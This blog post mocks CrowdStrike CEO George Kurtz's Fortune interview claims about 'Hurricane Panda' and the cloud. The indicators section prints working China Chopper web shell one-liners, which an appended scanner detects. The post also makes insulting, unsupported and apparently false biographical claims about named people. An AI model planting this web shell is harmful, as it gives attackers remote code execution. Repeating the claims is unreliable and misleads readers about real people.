Showing posts with label MS14-058. Show all posts

Saturday, August 1, 2015

CrowdStrike founder George Kurtz made some outrageous claims in Fortune Magazine this week

George Kurtz has quite the resume. Perhaps you remember the time he spent at McAfee, a company founded by a drug-addled heavily-armed lunatic and maybe murderer whose recent contributions to infosec include being one of the handful of companies to use the BSAFE encryption library in their products, the library famously back-doored by government security contractors/prostitutes RSA for a National Security Agency check in the amount of $10 million. Or perhaps you are more familiar with his time as Chief Financial Officer of General Motors, whose flagship "IT" product, OnStar, is best known to actual security researchers as the government tracking device that allows police to disable your car remotely and quite likely kill you in the process. Did I say police? Because I meant basically anybody who has a computer and can read. And did I say disable? Because I also meant unlock the car and start the engine.

George Kurtz is to the information technology community what Bull Connor was to the civil rights community. Which is to say: not helpful.
This photo is b+w to spare you from Mr Kurtz' ginger goatee
Look, I am being unfair. Just because George Kurtz was the most senior IT official at these companies when they happened to make these corporate decisions to willfully defecate on the basic expectations of service of their customers - information security at McAfee, and not becoming a splat on the highway at GM thanks to the whims of a 13 year old with emotional problems who can't get a thrill from World of Warcraft anymore - doesn't mean that George Kurtz is not what he bills himself as: an "internationally recognized security expert". I am sure that many people all over the planet would believe this about George Kurtz. Specifically, those people would be the ones who have never heard of and know nothing about George Kurtz or his career. There are billions of people world-wide who meet those criteria.

He also regularly uses the word "cyber" without a hint of irony, for example to announce new hires. "FBI's Top Cyber Lawyer Steven Chabinsky Joins CrowdStrike" "Former FBI Top Cyber Cop Shawn Henry joins as CrowdStrike Services President" ... all on his personal website called Security Battlefield that has a picture of a little army man for a logo.
Is this a backlit GI Joe being hit with a firecracker?
But this post isn't about the general tomfoolery that Mr Kurtz engages in. No, this is about a specific series of ridiculous claims made by Kurtz and parroted from the rooftops by Fortune magazine, like this:
"CEO and co-founder George Kurtz tells it like this: A besieged customer needed backup. So Kurtz’s team sent in reinforcements, placed its cloud-based software sensors across the breached business’s computing environment, and started gathering intel. Aha! Investigators spotted Hurricane Panda, an old Chinese nemesis that Kurtz’s crew had been battling since 2013. What happened next surprised them: When the attackers scanned an infected machine only to find traces of CrowdStrike, they fled."
aaaand this:
"'These fraudsters used to work a street corner—they had a geographic area of stealing and limited scalability,' Kurtz says. 'Now, because of the cloud, they can scale exponentially—no longer a street corner but the entire globe.'"
In two paragraphs of the article, the word "cloud" appears in every sentence. Replacing the word "cloud" with a word like "sorcery" provides a clearer understanding of the three-card monte game that Kurtz and people like him play with competency.

    "[sorcery] is essential to CrowdStrike’s success" 
    "[sorcery] also allows for rapid deployment" 
    "because of [sorcery], they can scale exponentially" 

You are led to believe that competency is underneath one of the cups; but it's not. Let's unpack these claims, starting with the first quote. There are at least six separate factual claims in this quote:

    1. "A besieged customer needed backup"
    2. "Kurtz’s team sent in reinforcements"
    3. "placed its cloud-based software sensors across the breached business’s computing environment"
    4. "and gathered intel"
    5. "Investigators spotted Hurricane Panda, an old Chinese nemesis that Kurtz’s crew had been battling since 2013"
    6. "When the attackers scanned an infected machine only to find traces of CrowdStrike, they fled"

When I say these statements are factual claims, I mean they are statements that are either true or false; furthermore I mean that evidence could be supplied to support these claims. Unfortunately, Fortune Magazine did not publish any follow up questions about this series of factual claims, and no evidence was supplied. It is my contention that, in the absence of convincing evidence, a few of these claims are reasonable to accept at face value, but most of them stretch the outer bounds of credulity. While Fortune Magazine didn't bother to fact check their article, CrowdStrike did explain the justification for some of these claims on their own blog and in other interviews. We will look at those.

    1. "A besieged customer needed backup"

This is a reasonable claim. CrowdStrike has customers, it is easy to accept the idea that one of those customers contacted CrowdStrike for some sort of service. 

There are some early warning signs though. The name of the customer is not mentioned, and although we can accept that an NDA exists we have to wonder about that agreement in more detail. If the customer wanted Kurtz telling the newspapers about how an attack was successfully resolved, which is not as rare a scenario as it might seem given the ethical and legal implications of large corporations sweeping such attacks under the rug, why didn't the customer join Kurtz to discuss the story with Fortune or other news organizations - or at the very least let Kurtz use the name of the customer as a case study? On the other side of this coin, if the customer did not want a nondisclosure exemption, then why is Kurtz talking to Fortune magazine about the details of an attack that would almost certainly be covered under even the lamest of NDAs?

That's not the only problem. Since Kurtz is alright with playing games with his customers' privacy, why not specifically state what this "siege" was? The most basic details of such an attack would lend credibility without revealing additional customer information. Was this a DoS? SQLi? XSS? Someone going after the email servers? Or did these servers encounter the sort of network scanning that every server connected to the internet does every day?

    2. "Kurtz’s team sent in reinforcements"

Another reasonable claim on its face, that again raises questions. Who were the reinforcements? If Kurtz doesn't trust his employees enough to identify them when their genius results in a complete victory over terrifying foreigners like "Hurricane Panda", why should CrowdStrike's customers provide them with access to their most sensitive network infrastructure?

    3. "placed its cloud-based software sensors across the breached business’s computing environment"

Here we have the first use of the word "cloud". Despite the idiocy of riding a media-buzzword horse that has been dead for well over five years, I am again willing to accept this claim at face value without further information. The use of "breached" in the past tense seems to provide at least a little more information than we had previously, but the clarification is chimerical. Does "breach" mean something like a rootkit, or does "breach" mean someone mapped part of the customer's private network using IGMP discovery?

    4. "and gathered intel"

Normal human beings would refer to this as reviewing log data. Once more it is not unreasonable to give Kurtz the benefit of the doubt here.

    5. "Investigators spotted Hurricane Panda, an old Chinese nemesis that Kurtz’s crew had been battling since 2013"

So this is where the real problems start. The problem is simple and straightforward: "Hurricane Panda" does not exist. Let's unpack that.

Not everyone that works at CrowdStrike is a schmuck. As far as I can tell, CrowdStrike's irascible schmuckiness is isolated to management, marketing, sales and legal. I am fairly confident that there is at least one competent tech employee at CrowdStrike. I am confident of this because CrowdStrike played some role in the discovery of one '0 day' exploit: CVE-2014-4113 (I've also been told a few of their tech guys have made a few decent tools available, like Tortilla, that I haven't tried yet ... this really isn't intended as an FU to the guys shoveling the coal at CrowdStrike, any more than mocking the Facebook guy's latest evil plot would be a slight to the guys shoveling coal at Facebook ... please consult the Death Star contractors conversation from the film Clerks for more information).

CrowdStrike's exact role in this discovery is unclear, because another group called FireEye was also credited with the discovery of the vulnerability. While FireEye itself is not free of controversy, there is simply no comparison between FireEye and CrowdStrike when it comes to security research. FireEye's $1 billion acquisition of Mandiant brought a lot of smart people to the team, and I am aware of at least 16 zero day exploits that FireEye has published. 16 > 1.

In response to CVE-2014-4113, Microsoft released a patch, MS14-058. Microsoft credits both CrowdStrike and FireEye in their post outlining MS14-058 (as well as crediting FireEye for a second 0-day addressed in the patch, CVE-2014-4148, which used malware embedded in TrueType font files). Neither Microsoft nor FireEye makes any mention of a single organized group behind the release of CVE-2014-4113 (the ridiculous Hurricane Panda name was dreamed up without rhyme or reason by CrowdStrike ... perhaps because panda bears come from China?). In fact, FireEye's blog post explaining their work on both exploits, released on the same day as CrowdStrike's fantastical panda story, goes out of its way to state that they believe CVE-2014-4113 was not the work of a single group (emphasis mine):

"The tool appears to have gone through at least three iterations over time. The initial tool and exploits is believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploits did and may have been retained privately, not necessarily even by the same actors."

The point here is clear. FireEye admits that the use of CVE-2014-4113 was limited, but was not owned by a single group. So what evidence does CrowdStrike provide to dispute the findings of their much more experienced and respected co-publisher? According to CrowdStrike, Panda attacks can be identified through their use of:

    A. The PlugX remote access tool

Why is this bullshit? AlienVault identified the author of PlugX in September of 2012 as a developer working for Chinansl Technology Co., Ltd with the email address (feel free to scrape and spam that address y'all) and a face only a mother could love. No pandas were included on this man's Baidu profile.
    B. Hurricane Electric's free DNS service

Hurricane Electric's (HE) free DNS service is famously insecure and used by many, many people. This is like using Firefox users as an identifier. It's meaningless.

    C. The China Chopper web shell

Finally, badass admin Keith Tyler broke the China Chopper story to the English-speaking world in late 2012. A little under a year later, FireEye released a two-part series (one & two) expanding on Tyler's work. Both of these posts contained the source code for the China Chopper client and a link to the domain where the software was available for download. Now, three years later, China Chopper is understood to be widely used. The client for the shell is an amazing 4 KB on disk and is extremely difficult to identify as malicious:

<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

On Apache:

<?php @eval($_POST['password']);?>

The odds of finding that in a giant godawful mess like Drupal or something are slim unless you know what you are looking for. That is why it is in use all over the place - it's great, it won't be detected by antivirus, and it's still not widely known. As with HE DNS, finding this proves nothing because this is a popular means of attack.
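A defender-side check for the two one-liners above, added here as an example and not code from the original post: it walks a web root and flags any server-side script that matches the China Chopper eval-on-request-parameter pattern. The signatures, suffix list and sample files are constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Signatures for the one-line China Chopper client quoted above. The regexes are
# assumptions written for this example (not a vendor feed): the ASPX/JScript form,
# and the PHP form with $_POST/$_GET/$_REQUEST and the assert() variant.
CHOPPER_SIGNATURES = {
    "chopper_aspx": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)', re.I),
    "chopper_php": re.compile(
        r'@?\s*(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[\s*["\'][^"\']+["\']\s*\]\s*\)', re.I),
}
# Server-side script extensions worth scanning; other files are skipped.
WEB_SUFFIXES = {".php", ".phtml", ".inc", ".asp", ".aspx", ".ashx", ".jsp"}

def scan_text(source: str) -> list:
    """Return the names of every signature that matches the given source text."""
    return [name for name, rx in CHOPPER_SIGNATURES.items() if rx.search(source)]

def scan_tree(root: Path) -> dict:
    """Walk a web root and map each flagged file (POSIX relative path) to its hits."""
    hits = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_SUFFIXES:
            continue
        names = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if names:
            hits[path.relative_to(root).as_posix()] = names
    return hits

# Constructed sample web root: the ASPX and PHP one-liners from the post dropped
# among benign files, including one that reads $_POST without eval (must not flag).
SAMPLES = {
    "uploads/cache.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "modules/helper.php": "<?php @eval($_POST['password']);?>",
    "api/save.php": "<?php $data = json_decode($_POST['payload'], true); ?>",
    "index.php": "<?php echo 'hello'; ?>",
}

def demo() -> dict:
    """Write the samples to a temp directory, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Pattern matching like this only catches the plain-text variants; obfuscated or encoded copies need a file-integrity baseline or runtime monitoring of what the web server process executes.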

    6. "When the attackers scanned an infected machine only to find traces of CrowdStrike, they fled"

This is the claim that compelled me to write this post. There is so much wrong with this. Fundamentally the statement is a cum hoc ergo propter hoc logical fallacy. Even if we take Kurtz at his word, that an attack of some kind was ongoing, that CrowdStrike installed software, and the attack then stopped, this, on its own, does not prove that CrowdStrike's presence caused the attack to stop. Even though the CrowdStrike install and the attack ceasing are correlated, this relationship does not imply causation.

The red flag that nonsense is occurring is amplified by the use of the word "fled". The word speaks to the state of mind of the supposed attackers, because to flee presupposes fear. The state of mind for these attackers is unknowable to Kurtz or CrowdStrike. Again if we take Kurtz at his word that an attack was ongoing, how could he know the attackers did not stop once they realized that someone, anyone, was logged into the server; or more realistically, that a human being was behind the supposed "attack", rather than a bot.

Remember back in #1 how we pointed out it was suspicious that Kurtz did not specify what kind of attack it was? That concern becomes much more important here in the sixth claim. Without an understanding of what kind of 'attack' this was, how can we determine why the attack stopped; or that, in fact, an attack had occurred at all? Network scanning, even aggressive network scanning, is a fact of life on the internet. Every server with an internet connection will be scanned by multiple hosts, multiple times, every day. Such scanning can abruptly stop for a number of reasons - the most common is that such scans look for a small set of software vulnerabilities and when they don't find them, they move on. Kurtz's story fits hand in glove with this sort of common behavior.

One last claim as we wrap this up:
"'These fraudsters used to work a street corner—they had a geographic area of stealing and limited scalability,' Kurtz says. 'Now, because of the cloud, they can scale exponentially—no longer a street corner but the entire globe.'"
The 'Cloud' has not had any impact on the tactics used to break into other people's computers, at least not in any way resembling what Kurtz described here. Botnets existed before virtualization became ubiquitous. The theories driving DDoS and spam remain unchanged even as individual exploits continue to be patched in older software and uncovered in newer software. The notion that those breaking into other computers are bound by a geographic area has always been false. It is so obviously and demonstrably false that it is difficult to begin to respond. Such a statement betrays a breathtaking lack of understanding about the history of the internet and the malicious use of computers. Some of the first people to break into NASA were from Australia. East German teenagers were among the first hackers to break into US military servers. Neither group was identified or bound by anything having to do with server architecture but by monitoring of telco traffic.

It is difficult to see what the readers of Fortune Magazine gain from the publication of long-winded, credulous, fact-free interviews. Furthermore, George Kurtz does a disservice to the customers of CrowdStrike as well as his own technical employees by speaking so incompetently about the field his company seeks to compete in.

RAT Bastard

Earlier this week, several servers I maintain were targeted by automated attempts to upload a remote access trojan (RAT). The RAT is a simpl...